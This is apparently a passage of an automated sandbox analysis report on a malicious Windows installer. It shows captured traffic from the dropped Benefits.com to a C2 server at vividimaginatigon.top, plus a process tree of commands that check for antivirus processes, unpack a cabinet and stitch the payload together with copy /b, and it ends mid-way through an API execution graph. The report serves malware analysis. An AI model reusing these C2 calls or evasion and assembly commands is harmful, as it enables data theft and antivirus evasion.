                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 44 e6 00 85 49 80 dc 4c 60 0f 94 e7 ec f0 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de fc 43 a0 fc 5f 64 60 6c ce 17 47 ed 7d d1 f5 c3
                                      Data Ascii: DIL`X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqypC_d`lG}
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 8d 6d a8 bb 82 32 50 45 2e af 0f e9 43 86 af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61 a0 a7 2e 79 1f 52 5b 47 00 cd 00 0f 28 c4 c5 b2
                                      Data Ascii: m2PE.CK'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a.yR[G(
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 59 ce 85 ad 94 83 08 1d aa 4d bd 0a 18 fd ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4 82 13 f2 23 5a b4 f9 ee e0 aa 77 3a c9 21 af 96
                                      Data Ascii: YML/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0#Zw:!
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 17 0b bc b9 d9 63 f1 f3 c4 fa 68 97 4f d5 a1 4a bf 15 5f f4 6f b7 dd c7 75 03 58 5e a9 58 1b 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c 38 c7 6c 60 1c ba ec 11 6b 8a 65 4d 7d 2c f8 54 d9 05 b9 a5 84 09 20 47 d8 11 bf e2 9f 10 69 04 ec 62 2e cf d4 c0 34 50 a3 12 36 39 3d 93 d3 8c 03 fb d5 da ed e1 c7 60 46 b1 fa 3f 46 49 6b f0 64 eb 15 9e c0 bd 80 05 55 f9 5e 24
                                      Data Ascii: chOJ_ouX^XxmDfZtN)nMy_`"3c.;{bDT!p^*9fQ5qlr>2|{`_N.eu*DEk~LI:[p!#OP|hd\8l`keM},T Gib.4P69=`F?FIkdU^$
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: a6 1c 4d 72 e7 1e 15 e3 bd c2 87 0f a7 8d 21 9a 82 6d f6 99 4b 9f 2e ff 9b ed 90 bf a3 74 a5 c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18 96 b7 f7 86 fb 8b 47 10 29 c3 8b 7e 08 cc 5a 7b 0b 03 11 41 6c 8b e4 76 73 44 de f2 7a c9 a3 e6 db 97 45 35 f1 bc 14 db 7f 74 e9 e1 05 4f 7c db 3f f0 aa 3c d4 25 07 cb 43 77 4a 41 10 06 3e 84 c1 bf db 85 17 40 fc 99 4a cf 16 b4
                                      Data Ascii: Mr!mK.tY*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0aG)~Z{AlvsDzE5tO|?<%CwJA>@J
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 53 b7 18 f1 d2 ce 7b 20 7a 86 95 3a 3c f8 8e db 86 d2 9a 0f 4a f6 95 a8 9c 44 3e 5a 58 0b c9 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1 58 f2 91 f8 2c 4b 9b 08 92 84 ac 5f 84 73 03 48 bd 8a ad 1d 16 15 ee bf 17 14 5a 2b 29 47 08 89 45 df 18 71 04 19 cd 0d ce 39 60 33 34 02 ed ba 56 0b f3 be 64 5c c2 e2 e3 df 3f 16 84 87 05 a1 3f 69 74 f7 e0 cf 42 8c 55 ff 99 ad
                                      Data Ascii: S{ z:<JD>ZX8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\|L`YO/wp!elJKLy_[X,K_sHZ+)GEq9`34Vd\??itBU
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 2d cd a3 b4 a1 f3 50 0e 0d 09 5a c4 e6 ff 64 14 92 cb 50 41 17 48 6e 24 58 e5 e4 ef 99 e3 d2 d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1 5f eb 2f 5e b9 ec a7 1d 5d 77 7b 88 0c cb 37 40 18 3c 5e 48 f1 f2 5b 15 e5 7b 0d f6 ba 33 bb d6 5e a8 0a 3d 36 d6 b9 1f 95 7e 81 75 04 a9 3a ab 81 4f 5d b7 cd db 78 e6 87 b7 e9 e6 c7 a9 9e cf 63 29 1e 7e ef 0a 68 19 38 83 c5 f1
                                      Data Ascii: -PZdPAHn$X:0]A_k`eM}_jd#nuit086:E(`[efa|m&GX^^?GsQNY/?Acc JdFFNSm-`_/^]w{7@<^H[{3^=6~u:O]xc)~h8
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: c3 df cc 67 95 e5 e8 ab b0 9a c3 48 50 6b 7f 5d d3 1e 3a 70 95 95 af ca 77 88 69 65 9f 1d b4 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53 29 27 b0 7e 64 a6 94 16 9d 27 36 7d 2b ef 56 0e 2b f4 d3 96 ec 7f 27 cc 9c 98 df 0e 48 4e b1 a1 b8 af 16 a7 c2 07 fe f5 32 d8 b3 fc a1 6e f6 c5 6c e4 7b e9 46 af f0 97 8b d5 7a 33 ee ca b3 96 ff a0 cf fe 83 76 8d 90 9a ad 16 ed
                                      Data Ascii: gHPk]:pwier;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES)'~d'6}+V+'HN2nl{Fz3v
                                      2025-01-31 18:50:03 UTC1135INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:50:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=8f7he2re9j7a02ekl4vb816tsu; expires=Sat, 01 Feb 2025 18:50:02 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zhja5H3efwu6xlYjd10b202j5IG3Cv9sVcXODECfLiceXa7lu03dpv0Xgae%2F9lkx2%2BssLDBK3DOgFICKKy98gKj0MYg2FMAfhYBPne4qwINnwuJ5AxteyGHbqzr9xnavUWkkBMMMxrw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe290dc734343-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1651&rtt_var=671&sent=203&recv=604&lost=0&retrans=0&sent_bytes=2853&recv_bytes=587896&delivery_rate=1569048&cwnd=244&unsent_bytes=0&cid=32d77fb7c6220aba&ts=1613&x=0"


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449747172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:50:03 UTC269OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 83
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:50:03 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 26 6a 3d 26 68 77 69 64 3d 45 41 39 38 45 42 38 44 31 44 44 43 33 43 33 36 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30
                                      Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--cheksa&j=&hwid=EA98EB8D1DDC3C3637A891171E8607C0
                                      2025-01-31 18:50:04 UTC1127INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:50:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=lubgro1tkr0e7rv3dmrhhv9d9k; expires=Sat, 01 Feb 2025 18:50:04 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HBbjSxwrfVkzLOmQI71rhz0weezWMloR9nbsLXuAJMmAN83mlbM2Lj39mDJLlcklrvAUF25XLRvsqbB%2FQ8Lki0W5mawcmiiXjR0e3uQptVt8oEJUP%2BWXEHo6lMFLeAPfDvvWH6gmJDQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe29eca748c05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2051&rtt_var=783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=988&delivery_rate=1386514&cwnd=218&unsent_bytes=0&cid=ed71d830b08bf2f9&ts=508&x=0"
                                      2025-01-31 18:50:04 UTC54INData Raw: 33 30 0d 0a 56 43 39 41 54 5a 71 64 67 56 76 55 74 55 4a 43 49 49 6e 41 5a 62 4a 35 46 45 69 6a 36 33 2f 6f 36 35 4a 31 6b 54 67 6b 4b 78 6b 50 63 67 3d 3d 0d 0a
                                      Data Ascii: 30VC9ATZqdgVvUtUJCIInAZbJ5FEij63/o65J1kTgkKxkPcg==
                                      2025-01-31 18:50:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:13:49:05
                                      Start date:31/01/2025
                                      Path:C:\Users\user\Desktop\setup.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\setup.exe"
                                      Imagebase:0x400000
                                      File size:83'896'395 bytes
                                      MD5 hash:C804E1074AF9D7CFFA16E6BD084BEA42
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:13:49:08
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:13:49:08
                                      Start date:31/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:13:49:09
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xbc0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:13:49:09
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /I "opssvc wrsa"
                                      Imagebase:0x3e0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:13:49:09
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xbc0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:13:49:09
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                      Imagebase:0x3e0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:13:49:10
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c md 224177
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:13:49:10
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                      Wow64 process (32bit):true
                                      Commandline:extrac32 /Y /E Wellington
                                      Imagebase:0xee0000
                                      File size:29'184 bytes
                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:9
                                      Start time:13:49:10
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /V "Tranny" Yale
                                      Imagebase:0x3e0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:13:49:10
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.com
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:11
                                      Start time:13:49:11
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated y
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:12
                                      Start time:13:49:11
                                      Start date:31/01/2025
                                      Path:C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      Wow64 process (32bit):true
                                      Commandline:Benefits.com y
                                      Imagebase:0xf70000
                                      File size:947'288 bytes
                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:13
                                      Start time:13:49:11
                                      Start date:31/01/2025
                                      Path:C:\Windows\SysWOW64\choice.exe
                                      Wow64 process (32bit):true
                                      Commandline:choice /d y /t 5
                                      Imagebase:0x990000
                                      File size:28'160 bytes
                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:17.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.7%
                                        Total number of Nodes:1526
                                        Total number of Limit Nodes:34
                                        execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 